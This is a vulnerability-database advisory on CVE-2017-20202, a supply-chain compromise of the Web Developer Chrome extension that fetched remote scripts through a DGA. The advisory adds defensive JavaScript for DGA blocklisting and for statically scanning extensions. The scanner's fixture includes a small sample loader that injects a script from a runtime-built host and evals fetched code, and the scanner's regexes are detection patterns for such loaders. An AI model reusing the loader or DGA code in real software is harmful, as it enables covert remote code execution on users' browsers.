CVE-2017-20202 in Web Developer

Summary

by MITRE • 10/09/2025

Web Developer for Chrome v0.4.9 contained malicious code that generated a domain via a DGA and fetched a remote script. The fetched script conditionally loaded follow-on modules that performed extensive ad substitution and malvertising, displayed fake "repair" alerts that redirected users to affiliate programs, and attempted to harvest credentials when users logged in. The injected components enumerated common banner sizes for substitution, replaced third-party ad calls, and redirected victim traffic to affiliate landing pages. Potential impacts include user-level code execution in the browser context, large-scale ad fraud and traffic hijacking, credential theft, and exposure to additional payloads delivered by the actor. The compromise was reported by the maintainer of Web Developer for Chrome on August 2, 2017 and remediated in v0.5.0.


Analysis

by VulDB Data Team • 10/09/2025

CVE-2017-20202 records a software supply-chain compromise rather than a coding flaw: version 0.4.9 of the Web Developer extension for Chrome, distributed through the Chrome Web Store, shipped with code its maintainer did not write. The trojanised build was published after the maintainer's Google account was taken over through a phishing email, so the store's ordinary auto-update path delivered it to the installed base without any action by users. The implant derived its command-and-control host names at runtime with a domain generation algorithm (DGA), which gives the operator a rotating set of domains to register and makes a static domain blocklist ineffective on its own.

The code embedded in the extension was only a loader: generate a domain, fetch a script from it, execute the result. Everything else (the follow-on modules) came from the attacker's server and could be changed without republishing the extension, which is why a review of the uploaded package alone would have seen little of the eventual behaviour. The fetched modules enumerated common banner sizes, replaced third-party ad calls with the attacker's own, and redirected traffic to affiliate landing pages. VulDB files the issue under CWE-94 (Improper Control of Generation of Code, "Code Injection"); CWE-506 (Embedded Malicious Code) describes the trojanised package itself. No privilege escalation was involved: the fetched code ran with exactly the permissions the extension already held.

The impact went beyond ad fraud. Fake "repair" alerts lured users to affiliate pages, and the modules attempted to capture credentials submitted on login forms, a man-in-the-browser position that can lead to account takeover on any site the user visits. In ATT&CK terms the incident maps to T1195.002 (Supply Chain Compromise: Compromise Software Supply Chain) and T1566 (Phishing) for the developer-account takeover, T1176 (Browser Extensions) for the foothold, T1568.002 (Dynamic Resolution: Domain Generation Algorithms) for C2, T1059.007 (Command and Scripting Interpreter: JavaScript) for the fetched payloads, and T1185 (Browser Session Hijacking) for the ad substitution and credential capture.

Because the extension runs inside the browser, the fetched code had access to whatever the extension's permissions exposed: the content of visited pages, cookies and sessions, and the ability to inject scripts into tabs. The affiliate and redirect logic monetised the install base, and the loader design meant further payloads could be delivered at any time without touching the store listing. The maintainer regained control of the account and published v0.5.0 on August 2, 2017; users who auto-updated received a clean build. The practical lessons are the ones that follow from the mechanism: protect developer store accounts with phishing-resistant MFA, treat any extension that assembles URLs at runtime and executes fetched text as remote code loading (which Manifest V3 now forbids outright), review extension update diffs and not only initial submissions, and alert on DGA-like DNS activity originating from browser processes.
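As an added example (not VulDB's text and not the Web Developer extension's code), the block below shows how a defender who has recovered an implant's DGA uses it: generate the day's candidate domains, build a blocklist covering adjacent days, and match DNS log lines against it. The algorithm here is a hypothetical, simplified stand-in (a date seed run through a 32-bit LCG); the real CVE-2017-20202 algorithm, seeds, TLD list and log format are not reproduced, and the sample log lines are constructed.

```javascript
// Added example, not the extension's code. Hypothetical DGA: UTC date seed -> LCG.
const TLDS = ['com', 'net', 'info'];            // assumed TLD list
const ALPHABET = 'abcdefghijklmnopqrstuvwxyz';

// Deterministic 32-bit linear congruential generator (Numerical Recipes constants).
function lcg(seed) {
  let state = seed >>> 0;
  return () => {
    state = (Math.imul(state, 1664525) + 1013904223) >>> 0;
    return state;
  };
}

// Seed from the UTC date so every infected client computes the same set that day.
function dateSeed(date) {
  return date.getUTCFullYear() * 10000 + (date.getUTCMonth() + 1) * 100 + date.getUTCDate();
}

// Generate `count` candidate C2 domains for one day.
function generateDomains(date, count = 10) {
  const next = lcg(dateSeed(date));
  const domains = [];
  for (let i = 0; i < count; i++) {
    const len = 8 + (next() % 8);               // label length 8..15
    let label = '';
    for (let j = 0; j < len; j++) label += ALPHABET[next() % ALPHABET.length];
    domains.push(`${label}.${TLDS[next() % TLDS.length]}`);
  }
  return domains;
}

// Blocklist for `date` plus/minus `windowDays`, to absorb clock skew and time zones.
function blocklist(date, windowDays = 1, count = 10) {
  const set = new Set();
  for (let d = -windowDays; d <= windowDays; d++) {
    const day = new Date(date.getTime() + d * 86400000);
    for (const dom of generateDomains(day, count)) set.add(dom);
  }
  return set;
}

// Match DNS log lines of the form "<timestamp> <client-ip> <qname>" (a constructed
// format, not any particular resolver's) against the blocklist.
function findHits(logLines, block) {
  const hits = [];
  for (const line of logLines) {
    const parts = line.trim().split(/\s+/);
    if (parts.length < 3) continue;             // skip malformed lines
    const qname = parts[2].toLowerCase().replace(/\.$/, ''); // strip trailing dot
    if (block.has(qname)) hits.push({ client: parts[1], qname });
  }
  return hits;
}

// Usage with constructed log lines for 2 August 2017 (the disclosure date).
const day = new Date(Date.UTC(2017, 7, 2));
const todays = generateDomains(day);
const sampleLog = [
  `2017-08-02T10:00:00Z 10.0.0.5 ${todays[3]}.`,
  '2017-08-02T10:00:01Z 10.0.0.6 www.example.com.',
  `2017-08-02T10:00:02Z 10.0.0.7 ${generateDomains(new Date(Date.UTC(2017, 7, 3)))[0]}`,
];
console.log(findHits(sampleLog, blocklist(day)));
```

The one-day window matters in practice: an infected client in a different time zone, or with a skewed clock, resolves tomorrow's or yesterday's set, so a blocklist built for a single date misses it.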
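The loader pattern described above (build a host name at runtime, inject a script tag or fetch and execute the result) is detectable statically, and that check is what an update review should run before trusting a new extension version. The block below is an added example, not VulDB's or the extension project's code: it scans extension JavaScript for that pattern and parses a Manifest V2 content_security_policy for script-src entries that admit remote hosts or 'unsafe-eval'. The check names, regexes and sample files are constructed for the example.

```javascript
// Added example, not the extension's code. Heuristic static checks for remote code loading.
const CHECKS = [
  { id: 'eval',         re: /\beval\b/,                                why: 'eval of runtime text' },
  { id: 'new-function', re: /\bnew\s+Function\s*\(/,                    why: 'Function constructor' },
  { id: 'script-tag',   re: /createElement\s*\(\s*['"]script['"]\s*\)/,  why: 'dynamic <script> injection' },
  { id: 'dyn-src',      re: /\.src\s*=\s*[^;\n]*\+/,                     why: 'script src assembled at runtime' },
  { id: 'dyn-fetch',    re: /\bfetch\s*\([^)]*\+/,                       why: 'fetch URL assembled at runtime' },
  { id: 'exec-code',    re: /executeScript\s*\([^)]*\bcode\s*:/,         why: 'tabs.executeScript with code string' },
];

// Scan one source file; returns one finding per (line, check) match.
function scanSource(file, source) {
  const findings = [];
  source.split('\n').forEach((text, i) => {
    for (const c of CHECKS) {
      if (c.re.test(text)) findings.push({ file, line: i + 1, id: c.id, why: c.why, text: text.trim() });
    }
  });
  return findings;
}

// Parse an MV2 content_security_policy string and report remote script sources.
// MV2's default is "script-src 'self'; object-src 'self'"; MV3 disallows remote code entirely.
function cspScriptSources(csp) {
  const directive = csp.split(';').map(s => s.trim()).find(s => s.startsWith('script-src'));
  if (!directive) return { remote: [], unsafeEval: false, missing: true };
  const sources = directive.split(/\s+/).slice(1);
  return {
    remote: sources.filter(s => !s.startsWith("'")),   // host/scheme sources such as https://cdn.example.net
    unsafeEval: sources.includes("'unsafe-eval'"),
    missing: false,
  };
}

// Scan a whole unpacked extension given as { path: contents }.
function scanExtension(files) {
  const findings = [];
  for (const [path, contents] of Object.entries(files)) {
    if (path === 'manifest.json') {
      const csp = JSON.parse(contents).content_security_policy;
      if (typeof csp === 'string') {
        const r = cspScriptSources(csp);
        for (const host of r.remote) {
          findings.push({ file: path, line: 0, id: 'csp-remote', why: `script-src allows ${host}`, text: csp });
        }
        if (r.unsafeEval) {
          findings.push({ file: path, line: 0, id: 'csp-unsafe-eval', why: "script-src allows 'unsafe-eval'", text: csp });
        }
      }
    } else if (path.endsWith('.js')) {
      findings.push(...scanSource(path, contents));
    }
  }
  return findings;
}

// Constructed sample files (not from the real extension): one loader, one clean file.
const SAMPLE_FILES = {
  'manifest.json': JSON.stringify({
    manifest_version: 2,
    name: 'sample',
    version: '0.0.1',
    content_security_policy: "script-src 'self' https://cdn.example.net; object-src 'self'",
  }),
  'loader.js': [
    '// builds a host name at runtime, injects a script tag and evals fetched text',
    'var host = pick(new Date()) + ".info";',
    'var s = document.createElement("script");',
    's.src = "https://" + host + "/loader.js";',
    'document.head.appendChild(s);',
    'fetch("https://" + host + "/m.js").then(r => r.text()).then(eval);',
  ].join('\n'),
  'panel.js': [
    '// local-only behaviour',
    'const panel = document.createElement("div");',
    'panel.textContent = "toolbar";',
    'document.body.appendChild(panel);',
  ].join('\n'),
};

console.log(scanExtension(SAMPLE_FILES));
```

Regex checks of this kind are a triage aid, not proof: minified or obfuscated code defeats them, and a legitimate extension may match one pattern. The useful signal is a new match appearing in a version diff of an extension that previously had none.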

Responsible

VulnCheck

Reservation

10/08/2025

Disclosure

10/09/2025

Moderation

accepted

CPE

ready

EPSS

0.00126

KEV

no

Activities

very low

Sources
